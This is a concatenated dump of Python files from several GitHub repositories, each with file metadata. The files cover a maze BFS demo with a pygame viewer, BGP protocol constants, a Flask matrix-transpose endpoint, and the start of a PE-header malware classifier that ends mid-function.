# dependencies
import random
class Board:
def __init__(self, width=10):
self.width = width
self.height = width * 2
self.WALL_CHANCE = .25
self.FLOOR_CHANCE = .15
# create the grid
self.create_random_grid()
def create_random_grid(self):
# reset old grid
self.grid = []
# generate cells for new grid
for i in range(self.width * self.height):
# is the cell at the left, right, top, or bottom?
is_left = True if i % self.width == 0 else False
is_right = True if i % self.width == self.width-1 else False
is_top = True if i < self.width else False
is_bottom = True if i > (self.width * self.height - self.width) else False
# create the cell
cell = {
"left" : is_left,
"right" : is_right,
"roof" : is_top,
"floor" : is_bottom,
"ID" : i
}
# append to grid
self.grid.append(cell)
# randomly generate walls
total = self.width * self.height
horizontal_amount = int(total * self.FLOOR_CHANCE)
verticle_amount = int(total * self.WALL_CHANCE)
# generate the walls
for _i in range(verticle_amount):
random_index = random.randrange(0, total)
adding_num = -1 if random_index == total - 1 else 1
first = "right" if adding_num == 1 else "left"
second = "right" if first == "left" else "left"
self.grid[random_index][first] = True
self.grid[random_index + adding_num][second] = True
# generate the floors
for _i in range(horizontal_amount):
random_index = random.randrange(0, total)
adding_num = self.width * -1 if random_index > (total - self.width) else self.width
first = "floor" if adding_num == self.width else "roof"
second = "floor" if first == "roof" else "roof"
self.grid[random_index][first] = True
self.grid[random_index + adding_num - 1][second] = True
def can_move_from(self, cell_index):
# TODO this works but it's a lot of repeated code. Can it be made better?
# can you move left
can_move_left = False
is_left = True if cell_index % self.width == 0 else False
if not is_left and self.grid[cell_index]["left"] == False:
left_cell = self.grid[cell_index - 1]
is_wall_left = True if left_cell["right"] == True else False
can_move_left = True if not is_wall_left else False
# can you move right
can_move_right = False
is_right = True if cell_index % self.width == self.width-1 else False
if not is_right and self.grid[cell_index]["right"] == False:
right_cell = self.grid[cell_index + 1]
is_wall_right = True if right_cell["left"] == True else False
can_move_right = True if not is_wall_right else False
# can you move up
can_move_up = False
is_top = True if cell_index < self.width else False
if not is_top and self.grid[cell_index]["roof"] == False:
top_cell = self.grid[cell_index - self.width]
is_wall_top = True if top_cell["floor"] == True else False
can_move_up = True if not is_wall_top else False
# can you move down
can_move_down = False
is_bottom = True if cell_index > (self.width * self.height - self.width) else False
if not is_bottom and self.grid[cell_index]["floor"] == False:
bottom_cell = self.grid[cell_index + self.width]
is_wall_bottom = True if bottom_cell["roof"] == True else False
can_move_down = True if not is_wall_bottom else False
# return the results
return can_move_left, can_move_right, can_move_up, can_move_down
def BFS(self):
"""breadth first search to find the quickest way to the bottom"""
start_i = random.randrange(0,self.width)
paths = [ [start_i] ]
solved = False
dead_ends = []
while not solved:
for path in paths:
# find all possibles moves from path
if len(dead_ends) >= len(paths) or len(paths) > 10000: # TODO this solution sucks
return False, False
# NOTE order is left right up down
if path[-1] >= (self.width * self.height - self.width):
solved = True
return paths, paths.index(path)
possible_moves = self.can_move_from(path[-1])
if True in possible_moves:
move_order = [-1, 1, (self.width) * -1, self.width]
first_append_flag = False
origonal_path = path.copy()
for i in range(4):
possible_move = possible_moves[i]
if possible_move:
move = move_order[i]
next_index = origonal_path[-1] + move
if not next_index in origonal_path:
if not first_append_flag:
path.append(next_index)
first_append_flag = True
else:
new_path = origonal_path.copy()
new_path.append(next_index)
paths.append(new_path)
if not first_append_flag:
dead_ends.append(paths.index(path))
else:
dead_ends.append(paths.index(path))
def pretty_print_BFS(self, path):
for i in range(self.width * self.height):
cell = self.grid[i]
in_path = True if cell["ID"] in path else False
number_str = str(i)
if len(number_str) == 1:
number_str += " "
elif len(number_str) == 2:
number_str += " "
end_str = "\n" if i % self.width == self.width-1 else " "
if in_path:
print('\033[92m' + number_str + '\033[0m', end=end_str)
else:
print(number_str, end=end_str)
print(path)
if __name__ == "__main__":
b = Board(10)
paths, index = b.BFS()
if paths is not False and index is not False:
b.pretty_print_BFS(paths[index])
else:
print('BFS gave up before reaching the bottom row; rerun to generate a new grid')
# can_move_left, can_move_right, can_move_up, can_move_down = b.can_move_from(0)
# print("can_move_left ", can_move_left)
# print("can_move_right ", can_move_right)
# print("can_move_up ", can_move_up)
# print("can_move_down ", can_move_down)
|
Python
| 191
| 35.329842
| 97
|
/lib/board.py
| 0.51333
| 0.506269
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# use pygame to show the board on a window
# dependencies
import pygame, random
class Window:
def __init__(self, board):
# init py game
pygame.init()
# width height
self.WIDTH = 600
self.HEIGHT = 600
# different display modes
self.display_one = False
self.display_all = False
# place holder
self.solution = []
self.display_all_c = 0
# the board to display on the window
self.board = board
# define the dimensions of the cells of the board
self.cell_width = self.WIDTH // self.board.width
# define the left padding for the grid
total_width = self.cell_width * self.board.width
self.left_padding = (self.WIDTH - total_width) // 2
# colors
self.COLORS = {
"BLACK" : (255, 255, 255),
"GREY" : (230, 230, 230),
"BLUE" : (0, 0, 255),
"RED" : (255, 0, 0),
"YELLOW" : (212, 175, 55)
}
def create_random_color(self):
return (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))
def create_window(self):
# define window
self.WIN = pygame.display.set_mode( (self.WIDTH, self.HEIGHT) )
# name window
pygame.display.set_caption("LIGHT NING")
# logo/icon for window
logo = pygame.image.load("images/logo.png")
pygame.display.set_icon(logo)
def get_BFS(self):
solved = False
while not solved:
self.board.create_random_grid()
paths, index = self.board.BFS()
if paths is not False and index is not False:
self.solution = paths[index]
solved = True
self.paths = paths
self.solution_i = index
def draw_grid_solution(self):
fflag = True
for i in range(self.board.width * self.board.height):
if not i in self.solution: continue
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, self.COLORS["YELLOW"], r)
def draw_BFS(self):
if self.display_all_c >= len(self.paths):
self.display_all_c = 0
# generate a color for each path
path_colors = []
for path in self.paths:
path_colors.append(self.create_random_color())
path_colors[-1] = (0, 0 ,0)
temp = self.paths.pop(self.display_all_c)
self.paths.append(temp)
for path in self.paths:
for i in path:
# might not work
col_num = i % self.board.width
row_num = i // self.board.width
x_pos = self.left_padding + (col_num * self.cell_width)
y_pos = row_num * self.cell_width
# define rect
r = pygame.Rect(x_pos, y_pos, self.cell_width, self.cell_width)
# draw the rectangle
pygame.draw.rect(self.WIN, path_colors[self.paths.index(path)], r)
self.display_all_c += 1
def draw_window(self):
self.WIN.fill(self.COLORS["GREY"])
if self.display_one:
self.draw_grid_solution()
elif self.display_all:
self.draw_BFS()
pygame.display.update()
def main(self):
# create window
self.create_window()
self.running = True
while self.running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_0:
self.get_BFS()
elif event.key == pygame.K_1:
# toggle display one
self.display_one = not self.display_one
if self.display_one:
self.display_all = False
elif event.key == pygame.K_2:
# toggle display all
self.display_all = not self.display_all
if self.display_all:
self.display_all_c = 0
self.display_one = False
self.draw_window()
if __name__ == "__main__":
# Window needs a Board instance; assumes this script is run from inside lib/
# so the sibling board module can be imported directly
from board import Board
win = Window(Board())
win.main()
|
Python
| 159
| 28.754717
| 87
|
/lib/window.py
| 0.501057
| 0.487104
|
TheDinner22/lightning-sim
|
refs/heads/main
|
# this could and will be better; I just needed to make it here as a
# proof of concept, but it will be online and better later
import os, sys
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # adds project dir to places it looks for the modules
sys.path.append(BASE_PATH)
from lib.board import Board
from lib.window import Window
b = Board()
win = Window(b)
win.main()
|
Python
| 15
| 25.4
| 125
|
/main.py
| 0.736709
| 0.736709
|
JoeChan/openbgp
|
refs/heads/master
|
# Copyright 2015 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
""" All BGP constant values """
# some handy things to know
BGP_MAX_PACKET_SIZE = 4096
BGP_MARKER_SIZE = 16 # size of BGP marker
BGP_HEADER_SIZE = 19 # size of BGP header, including marker
BGP_MIN_OPEN_MSG_SIZE = 29
BGP_MIN_UPDATE_MSG_SIZE = 23
BGP_MIN_NOTIFICATION_MSG_SIZE = 21
BGP_MIN_KEEPALVE_MSG_SIZE = BGP_HEADER_SIZE
BGP_TCP_PORT = 179
BGP_ROUTE_DISTINGUISHER_SIZE = 8
# BGP message types
BGP_OPEN = 1
BGP_UPDATE = 2
BGP_NOTIFICATION = 3
BGP_KEEPALIVE = 4
BGP_ROUTE_REFRESH = 5
BGP_CAPABILITY = 6
BGP_ROUTE_REFRESH_CISCO = 0x80
BGP_SIZE_OF_PATH_ATTRIBUTE = 2
# attribute flags, from RFC1771
BGP_ATTR_FLAG_OPTIONAL = 0x80
BGP_ATTR_FLAG_TRANSITIVE = 0x40
BGP_ATTR_FLAG_PARTIAL = 0x20
BGP_ATTR_FLAG_EXTENDED_LENGTH = 0x10
# SSA flags
BGP_SSA_TRANSITIVE = 0x8000
BGP_SSA_TYPE = 0x7FFF
# SSA Types
BGP_SSA_L2TPv3 = 1
BGP_SSA_mGRE = 2
BGP_SSA_IPSec = 3
BGP_SSA_MPLS = 4
BGP_SSA_L2TPv3_IN_IPSec = 5
BGP_SSA_mGRE_IN_IPSec = 6
# AS_PATH segment types
AS_SET = 1 # RFC1771
AS_SEQUENCE = 2 # RFC1771
AS_CONFED_SET = 4 # RFC1965 has the wrong values, corrected in
AS_CONFED_SEQUENCE = 3 # draft-ietf-idr-bgp-confed-rfc1965bis-01.txt
# OPEN message Optional Parameter types
BGP_OPTION_AUTHENTICATION = 1 # RFC1771
BGP_OPTION_CAPABILITY = 2 # RFC2842
# attribute types
BGPTYPE_ORIGIN = 1 # RFC1771
BGPTYPE_AS_PATH = 2 # RFC1771
BGPTYPE_NEXT_HOP = 3 # RFC1771
BGPTYPE_MULTI_EXIT_DISC = 4 # RFC1771
BGPTYPE_LOCAL_PREF = 5 # RFC1771
BGPTYPE_ATOMIC_AGGREGATE = 6 # RFC1771
BGPTYPE_AGGREGATOR = 7 # RFC1771
BGPTYPE_COMMUNITIES = 8 # RFC1997
BGPTYPE_ORIGINATOR_ID = 9 # RFC2796
BGPTYPE_CLUSTER_LIST = 10 # RFC2796
BGPTYPE_DPA = 11 # work in progress
BGPTYPE_ADVERTISER = 12 # RFC1863
BGPTYPE_RCID_PATH = 13 # RFC1863
BGPTYPE_MP_REACH_NLRI = 14 # RFC2858
BGPTYPE_MP_UNREACH_NLRI = 15 # RFC2858
BGPTYPE_EXTENDED_COMMUNITY = 16 # Draft Ramachandra
BGPTYPE_NEW_AS_PATH = 17 # draft-ietf-idr-as4bytes
BGPTYPE_NEW_AGGREGATOR = 18 # draft-ietf-idr-as4bytes
BGPTYPE_SAFI_SPECIFIC_ATTR = 19 # draft-kapoor-nalawade-idr-bgp-ssa-00.txt
BGPTYPE_TUNNEL_ENCAPS_ATTR = 23 # RFC5512
BGPTYPE_LINK_STATE = 99
BGPTYPE_ATTRIBUTE_SET = 128
# VPN Route Target #
BGP_EXT_COM_RT_0 = 0x0002 # Route Target,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RT_1 = 0x0102 # Route Target,Format IPv4 address(4bytes):AN(2bytes)
BGP_EXT_COM_RT_2 = 0x0202 # Route Target,Format AS(4bytes):AN(2bytes)
# Route Origin (SOO site of Origin)
BGP_EXT_COM_RO_0 = 0x0003 # Route Origin,Format AS(2bytes):AN(4bytes)
BGP_EXT_COM_RO_1 = 0x0103 # Route Origin,Format IP address:AN(2bytes)
BGP_EXT_COM_RO_2 = 0x0203 # Route Origin,Format AS(2bytes):AN(4bytes)
# BGP Flow Spec
BGP_EXT_TRA_RATE = 0x8006 # traffic-rate 2-byte as#, 4-byte float
BGP_EXT_TRA_ACTION = 0x8007 # traffic-action bitmask
BGP_EXT_REDIRECT = 0x8008 # redirect 6-byte Route Target
BGP_EXT_TRA_MARK = 0x8009 # traffic-marking DSCP value
# BGP cost cummunity
BGP_EXT_COM_COST = 0x4301
# BGP link bandwith
BGP_EXT_COM_LINK_BW = 0x4004
# NLRI type as define in BGP flow spec RFC
BGPNLRI_FSPEC_DST_PFIX = 1 # RFC 5575
BGPNLRI_FSPEC_SRC_PFIX = 2 # RFC 5575
BGPNLRI_FSPEC_IP_PROTO = 3 # RFC 5575
BGPNLRI_FSPEC_PORT = 4 # RFC 5575
BGPNLRI_FSPEC_DST_PORT = 5 # RFC 5575
BGPNLRI_FSPEC_SRC_PORT = 6 # RFC 5575
BGPNLRI_FSPEC_ICMP_TP = 7 # RFC 5575
BGPNLRI_FSPEC_ICMP_CD = 8 # RFC 5575
BGPNLRI_FSPEC_TCP_FLAGS = 9 # RFC 5575
BGPNLRI_FSPEC_PCK_LEN = 10 # RFC 5575
BGPNLRI_FSPEC_DSCP = 11 # RFC 5575
BGPNLRI_FSPEC_FRAGMENT = 12 # RFC 5575
# BGP message Constants
VERSION = 4
PORT = 179
HDR_LEN = 19
MAX_LEN = 4096
# BGP messages type
MSG_OPEN = 1
MSG_UPDATE = 2
MSG_NOTIFICATION = 3
MSG_KEEPALIVE = 4
MSG_ROUTEREFRESH = 5
MSG_CISCOROUTEREFRESH = 128
# BGP Capabilities Support
SUPPORT_4AS = False
CISCO_ROUTE_REFRESH = False
NEW_ROUTE_REFRESH = False
GRACEFUL_RESTART = False
# AFI_SAFI mapping
AFI_SAFI_DICT = {
(1, 1): 'ipv4',
(1, 4): 'label_ipv4',
(1, 128): 'vpnv4',
(2, 1): 'ipv6',
(2, 4): 'label_ipv6',
(2, 128): 'vpnv6'
}
AFI_SAFI_STR_DICT = {
'ipv4': (1, 1),
'ipv6': (1, 2)
}
# BGP FSM State
ST_IDLE = 1
ST_CONNECT = 2
ST_ACTIVE = 3
ST_OPENSENT = 4
ST_OPENCONFIRM = 5
ST_ESTABLISHED = 6
# BGP Timer (seconds)
DELAY_OPEN_TIME = 10
ROUTE_REFRESH_TIME = 10
LARGER_HOLD_TIME = 4 * 60
CONNECT_RETRY_TIME = 30
IDLEHOLD_TIME = 30
HOLD_TIME = 120
stateDescr = {
ST_IDLE: "IDLE",
ST_CONNECT: "CONNECT",
ST_ACTIVE: "ACTIVE",
ST_OPENSENT: "OPENSENT",
ST_OPENCONFIRM: "OPENCONFIRM",
ST_ESTABLISHED: "ESTABLISHED"
}
# Notification error codes
ERR_MSG_HDR = 1
ERR_MSG_OPEN = 2
ERR_MSG_UPDATE = 3
ERR_HOLD_TIMER_EXPIRED = 4
ERR_FSM = 5
ERR_CEASE = 6
# Notification suberror codes
ERR_MSG_HDR_CONN_NOT_SYNC = 1
ERR_MSG_HDR_BAD_MSG_LEN = 2
ERR_MSG_HDR_BAD_MSG_TYPE = 3
ERR_MSG_OPEN_UNSUP_VERSION = 1
ERR_MSG_OPEN_BAD_PEER_AS = 2
ERR_MSG_OPEN_BAD_BGP_ID = 3
ERR_MSG_OPEN_UNSUP_OPT_PARAM = 4
ERR_MSG_OPEN_UNACCPT_HOLD_TIME = 6
ERR_MSG_OPEN_UNSUP_CAPA = 7 # RFC 5492
ERR_MSG_OPEN_UNKNO = 8
ERR_MSG_UPDATE_MALFORMED_ATTR_LIST = 1
ERR_MSG_UPDATE_UNRECOGNIZED_WELLKNOWN_ATTR = 2
ERR_MSG_UPDATE_MISSING_WELLKNOWN_ATTR = 3
ERR_MSG_UPDATE_ATTR_FLAGS = 4
ERR_MSG_UPDATE_ATTR_LEN = 5
ERR_MSG_UPDATE_INVALID_ORIGIN = 6
ERR_MSG_UPDATE_INVALID_NEXTHOP = 8
ERR_MSG_UPDATE_OPTIONAL_ATTR = 9
ERR_MSG_UPDATE_INVALID_NETWORK_FIELD = 10
ERR_MSG_UPDATE_MALFORMED_ASPATH = 11
ERR_MSG_UPDATE_UNKOWN_ATTR = 12
AttributeID_dict = {
1: 'ORIGIN',
2: 'AS_PATH',
3: 'NEXT_HOP',
4: 'MULTI_EXIT_DISC',
5: 'LOCAL_PREF',
6: 'ATOMIC_AGGREGATE',
7: 'AGGREGATOR',
8: 'COMMUNITY',
9: 'ORIGINATOR_ID',
10: 'CLUSTER_LIST',
14: 'MP_REACH_NLRI',
15: 'MP_UNREACH_NLRI',
16: 'EXTENDED_COMMUNITY',
17: 'AS4_PATH',
18: 'AS4_AGGREGATOR'
}
ATTRSTR_DICT = {
'AGGREGATOR': 7,
'AS4_AGGREGATOR': 18,
'AS4_PATH': 17,
'AS_PATH': 2,
'ATOMIC_AGGREGATE': 6,
'CLUSTER_LIST': 10,
'COMMUNITY': 8,
'EXTENDED_COMMUNITY': 16,
'LOCAL_PREFERENCE': 5,
'MP_REACH_NLRI': 14,
'MP_UNREACH_NLRI': 15,
'MULTI_EXIT_DISC': 4,
'NEXT_HOP': 3,
'ORIGIN': 1,
'ORIGINATOR_ID': 9}
TCP_MD5SIG_MAXKEYLEN = 80
SS_PADSIZE_IPV4 = 120
TCP_MD5SIG = 14
SS_PADSIZE_IPV6 = 100
SIN6_FLOWINFO = 0
SIN6_SCOPE_ID = 0
COMMUNITY_DICT = False
|
Python
| 267
| 24.932585
| 80
|
/openbgp/common/constants.py
| 0.69103
| 0.617362
|
Glitchfix/TransposeMatrixIndorse
|
refs/heads/master
|
from flask import Flask, render_template, request, jsonify
from flask_cors import CORS
import json
import numpy as np
app = Flask(__name__)
CORS(app)
@app.route('/transpose', methods=["POST"])
def homepage():
data = request.json
result = None
error = ""
try:
mat = data["matrix"]
mat = np.array(mat)
result = mat.T.tolist()
error = ""
except KeyError as e:
error = "Key %s not found" % (str(e))
pass
except Exception as e:
error = str(e)
pass
return jsonify({"result": result, "error": error})
app.run()
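# Example client call (a sketch; assumes the server is running locally on
# Flask's default port 5000):
#
#   import requests
#   resp = requests.post('http://127.0.0.1:5000/transpose',
#                        json={'matrix': [[1, 2, 3], [4, 5, 6]]})
#   print(resp.json())  # {'result': [[1, 4], [2, 5], [3, 6]], 'error': ''}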
|
Python
| 29
| 19.724138
| 58
|
/server.py
| 0.579035
| 0.579035
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import test_python3
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.title("Malware Detection")
self.minsize(500, 300)
self.labelFrame = ttk.LabelFrame(self, text = " Open File")
self.labelFrame.grid(column = 0, row = 1, padx = 200, pady = 20)
self.button()
def button(self):
self.button = ttk.Button(self.labelFrame, text = "Browse A File",command = self.fileDialog)
self.button.grid(column = 1, row = 1)
def fileDialog(self):
self.filename = filedialog.askopenfilename(initialdir = "/", title = "Select A File")
self.label = ttk.Label(self.labelFrame, text = "")
self.label.grid(column = 1, row = 2)
self.label.configure(text = self.filename)
root = Root()
root.mainloop()
|
Python
| 35
| 24.685715
| 99
|
/python/gui.py
| 0.620267
| 0.600223
|
shlsheth263/malware-detection-using-ANN
|
refs/heads/master
|
#!/usr/bin/env python
import sys
import time
import pandas as pd
import pepy
import binascii
import numpy as np
from hashlib import md5
import sklearn
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
from tensorflow.keras.models import load_model
def test(p):
exe = {}
print("Signature: %s" % int(p.signature))
exe['Signature'] = int(p.signature)
exe['Magic'] = int(p.magic)
print("Machine: %s (%s)" % (int(p.machine), p.get_machine_as_str()))
exe['Machine'] = int(p.machine), p.get_machine_as_str()
print("Number of sections: %s" % p.numberofsections)
exe['Number of Sections'] = p.numberofsections
print("Number of symbols: %s" % p.numberofsymbols)
exe['Number of symbols'] = p.numberofsymbols
print("Characteristics: %s" % int(p.characteristics))
exe['characteristics'] = int(p.characteristics)
exe['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp))
print("Timedatestamp: %s" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(p.timedatestamp)))
exe['CodeSize'] = int(p.codesize)
print("Size of code: %s" % int(p.codesize))
exe['SizeofInitial'] = int(p.initdatasize)
print("Size of initialized data: %s" % int(p.initdatasize))
exe['UninitSize'] = int(p.uninitdatasize)
print("Size of uninitialized data: %s" % int(p.uninitdatasize))
exe['Baseofcode'] = int(p.baseofcode)
print("Base address of code: %s" % int(p.baseofcode))
try:
exe['baseaddr'] = int(p.baseofdata)
print("Base address of data: %s" % int(p.baseofdata))
except:
# Not available on PE32+, ignore it.
pass
exe['imagebase'] = int(p.imagebase)
print("Image base address: %s" % int(p.imagebase))
exe['sectionalign'] = int(p.sectionalignement)
print("Section alignment: %s" % int(p.sectionalignement))
exe['filealign'] = int(p.filealignment)
print("File alignment: %s" % int(p.filealignment))
exe['imagesize'] = int(p.imagesize)
print("Size of image: %s" % int(p.imagesize))
exe['headersize'] = int(p.headersize)
print("Size of headers: %s" % int(p.headersize))
exe['checksum'] = int(p.checksum)
print("Checksum: %s" % int(p.checksum))
exe['dllchar'] = int(p.dllcharacteristics)
print("DLL characteristics: %s" % int(p.dllcharacteristics))
exe['stacksize'] = int(p.stackreservesize)
print("Size of stack reserve: %s" % int(p.stackreservesize))
exe['stackcommit'] = int(p.stackcommitsize)
print("Size of stack commit: %s" % int(p.stackcommitsize))
exe['heapsize'] = int(p.heapreservesize)
print("Size of heap reserve: %s" % int(p.heapreservesize))
exe['heapcommit'] = int(p.heapcommitsize)
print("Size of heap commit: %s" % int(p.heapcommitsize))
exe['rva'] = int(p.rvasandsize)
print("Number of RVA and sizes: %s" % int(p.rvasandsize))
ep = p.get_entry_point()
byts = p.get_bytes(ep, 8)
print("Bytes at %s: %s" % (int(ep), ' '.join(['%#2x' % b for b in byts])))
sections = p.get_sections()
print("Sections: (%i)" % len(sections))
for sect in sections:
print("[+] %s" % sect.name)
print("\tBase: %s" % int(sect.base))
print("\tLength: %s" % sect.length)
print("\tVirtual address: %s" % int(sect.virtaddr))
print("\tVirtual size: %i" % sect.virtsize)
print("\tNumber of Relocations: %i" % sect.numrelocs)
print("\tNumber of Line Numbers: %i" % sect.numlinenums)
print("\tCharacteristics: %s" % int(sect.characteristics))
if sect.length:
print("\tFirst 10 bytes: 0x%s" % binascii.hexlify(sect.data[:10]))
print("\tMD5: %s" % md5(sect.data).hexdigest())
imports = p.get_imports()
print("Imports: (%i)" % len(imports))
l = []
for imp in imports:
l.append((imp.sym, imp.name, int(imp.addr)))
# exe['symbol'] = imp.sym,imp.name,int(imp.addr)
print("[+] Symbol: %s (%s %s)" % (imp.sym, imp.name, int(imp.addr)))
exe['symbol'] = l
exports = p.get_exports()
print("Exports: (%i)" % len(exports))
for exp in exports:
exe['module'] = exp.mod, exp.func, int(exp.addr)
print("[+] Module: %s (%s %s)" % (exp.mod, exp.func, int(exp.addr)))
relocations = p.get_relocations()
print("Relocations: (%i)" % len(relocations))
for reloc in relocations:
print("[+] Type: %s (%s)" % (reloc.type, int(reloc.addr)))
resources = p.get_resources()
print("Resources: (%i)" % len(resources))
for resource in resources:
print("[+] MD5: (%i) %s" % (len(resource.data), md5(resource.data).hexdigest()))
if resource.type_str:
print("\tType string: %s" % resource.type_str)
else:
print("\tType: %s (%s)" % (int(resource.type), resource.type_as_str()))
if resource.name_str:
print("\tName string: %s" % resource.name_str)
else:
print("\tName: %s" % int(resource.name))
if resource.lang_str:
print("\tLang string: %s" % resource.lang_str)
else:
print("\tLang: %s" % int(resource.lang))
print("\tCodepage: %s" % int(resource.codepage))
print("\tRVA: %s" % int(resource.RVA))
print("\tSize: %s" % int(resource.size))
return exe
class Root(Tk):
def __init__(self):
super(Root, self).__init__()
self.mean_entropy = 6.69
self.mean_size = 6.895724 * 10 ** 6
self.mean_pointer = 5.513845 * 10 ** 5
self.mean_petype = 267
self.mean_optionalHeader = 224
self.mean_timestamp = 1.223333 * 10 ** 9
self.var = [2.45814868e+00, 5.78522477e+05, 4.59263747e-02, 3.94699109e+00
, 5.56093128e+05, 4.23275300e-02, 4.28793369e+00, 5.09558456e+05
, 4.26259209e-02, 4.52582805e+00, 5.00721420e+05, 4.38214743e-02
, 4.80847515e+00, 3.36937892e+05, 3.42121736e-02, 5.08079739e+00
, 2.82976405e+05, 3.27880482e-02, 5.19862150e+00, 2.51661820e+05
, 3.03001968e-02, 5.49108651e+00, 2.74803628e+05, 2.34008748e-02
, 5.65433567e+00, 2.61551950e+05, 2.20549168e-02, 5.82167673e+00
, 2.75945872e+05, 1.92542233e-02, 5.39081620e+00, 2.43941220e+05
, 1.66215197e-02, 5.25240971e+00, 2.13100610e+05, 1.38812852e-02
, 4.97209114e+00, 1.79580514e+05, 1.12734193e-02, 4.91835550e+00
, 1.81600442e+05, 9.08298818e-03, 4.67832320e+00, 1.75802757e+05
, 7.47834940e-03, 4.43536234e+00, 1.83062732e+05, 5.76560040e-03
, 3.36212748e+00, 1.05659050e+05, 4.12555574e-03, 3.44924796e+00
, 1.24784300e+05, 3.04785086e-03, 2.55147211e+00, 1.04770043e+05
, 2.20631168e-03, 2.63965525e+00, 1.31953132e+05, 1.50017798e-03
, 1.35032309e+13, 5.91049166e+13, 2.74411618e+08, 2.27146205e+08
, 1.30716250e+00, 1.02203650e+06, 1.64823331e+17, 9.70130473e+00
, 0.00000000e+00, 6.95117702e+14, 6.26391725e+00, 6.32965418e+14
, 0.00000000e+00, 1.39712067e+15, 3.09269595e+15, 2.53964553e+12
, 1.60595659e+06, 2.89297402e+14, 2.38878188e+15, 0.00000000e+00
, 1.35741026e+13, 8.21475966e+16, 8.55336176e-02, 1.57953396e-02
, 1.06058200e-02, 8.71010278e-03, 7.42508784e-03, 6.52156777e-03
, 5.72855385e-03, 4.99552441e-03, 4.36254449e-03, 3.93076962e-03
, 3.63767050e-03, 3.37999893e-03, 3.20280197e-03, 3.04227928e-03
, 2.93082120e-03, 2.85412932e-03, 2.79797761e-03, 2.71092621e-03
, 2.61535713e-03, 2.55340228e-03, 2.48501139e-03, 2.42902100e-03
, 2.36850195e-03, 2.29861381e-03, 2.23819994e-03, 2.17795827e-03
, 2.11676028e-03, 2.06515542e-03, 2.01478973e-03, 1.96564128e-03
, 1.91556309e-03, 1.86943149e-03, 1.83240435e-03, 1.79120738e-03
, 1.75672559e-03, 1.71652747e-03, 1.68120594e-03, 1.65315473e-03
, 1.62036128e-03, 1.59368312e-03, 1.56195259e-03, 1.53480747e-03
, 1.50568561e-03, 1.48263107e-03, 1.46131105e-03, 1.43606408e-03
, 1.41276985e-03, 1.39413270e-03, 1.37646323e-03, 1.35706705e-03]
self.mean = [3.38644034e+00, 7.43425464e+02, 6.40294006e-01, 3.41446464e+00
, 7.43311042e+02, 3.93069798e-01, 3.44198895e+00, 7.65279393e+02
, 3.30402571e-01, 3.37149071e+00, 7.42151971e+02, 2.99447860e-01
, 3.17242069e+00, 5.44187845e+02, 2.54659310e-01, 3.13009675e+00
, 4.84051874e+02, 2.31965387e-01, 3.03159921e+00, 4.77210895e+02
, 2.11030105e-01, 2.91210220e+00, 4.75812355e+02, 1.79221157e-01
, 2.48661283e+00, 4.07247419e+02, 1.46988188e-01, 2.35089123e+00
, 4.09849329e+02, 1.27373824e-01, 2.05407365e+00, 3.31339017e+02
, 1.09869680e-01, 1.83130422e+00, 2.84458239e+02, 9.13302463e-02
, 1.65633359e+00, 2.43290193e+02, 7.70382677e-02, 1.53908652e+00
, 2.37653259e+02, 6.49126524e-02, 1.40798980e+00, 2.15514487e+02
, 5.50734013e-02, 1.27721807e+00, 2.05804280e+02, 4.48429695e-02
, 9.54851129e-01, 1.16369741e+02, 3.33964758e-02, 9.08127297e-01
, 1.24898928e+02, 2.66482729e-02, 6.62233444e-01, 1.04622009e+02
, 1.90757276e-02, 6.01659959e-01, 1.28183120e+02, 1.37406010e-02
, 1.70803755e+05, 8.91260553e+05, 1.89259938e+04, 1.02192320e+04
, 6.69685927e+00, 8.22232244e+02, 1.63555414e+08, 3.32080948e+02
, 2.67000000e+02, 5.19991299e+05, 5.71698208e+00, 2.24746765e+05
, 2.67000000e+02, 6.57049714e+05, 6.93815969e+06, 6.83251704e+05
, 1.59274898e+03, 2.44727973e+06, 1.63751281e+06, 2.24000000e+02
, 1.71372990e+05, 1.22412702e+09, 3.23793663e-01, 1.76607058e-01
, 1.55393276e-01, 1.45630353e-01, 1.37842988e-01, 1.31876001e-01
, 1.25851666e-01, 1.20359017e-01, 1.15054661e-01, 1.10336582e-01
, 1.05885689e-01, 1.01550953e-01, 9.65836144e-02, 9.22891413e-02
, 8.80601110e-02, 8.45020529e-02, 8.11572167e-02, 7.87433791e-02
, 7.69100818e-02, 7.45285251e-02, 7.27705280e-02, 7.10439361e-02
, 6.96190823e-02, 6.82907176e-02, 6.71648772e-02, 6.60168642e-02
, 6.49738245e-02, 6.39356689e-02, 6.31187099e-02, 6.23316077e-02
, 6.14790592e-02, 6.07008932e-02, 5.98904188e-02, 5.90441028e-02
, 5.82944078e-02, 5.76313235e-02, 5.69379230e-02, 5.60963207e-02
, 5.53104343e-02, 5.47383798e-02, 5.40714718e-02, 5.34539907e-02
, 5.28624994e-02, 5.23242945e-02, 5.18031428e-02, 5.11818326e-02
, 5.05779398e-02, 4.99491364e-02, 4.95038547e-02, 4.90042634e-02]
self.mean=np.array(self.mean)
self.var=np.array(self.var)
def fileDialog(self):
x = test(pepy.parse(self.filename))
importedDLL = set()
importedSymbols = set()
for row in x['symbol']:
importedSymbols.add(row[0])
importedDLL.add(row[1])
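        # assemble the raw feature vector in the order expected by the trained model; the self.mean_* constants stand in for fields not extracted from this binary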
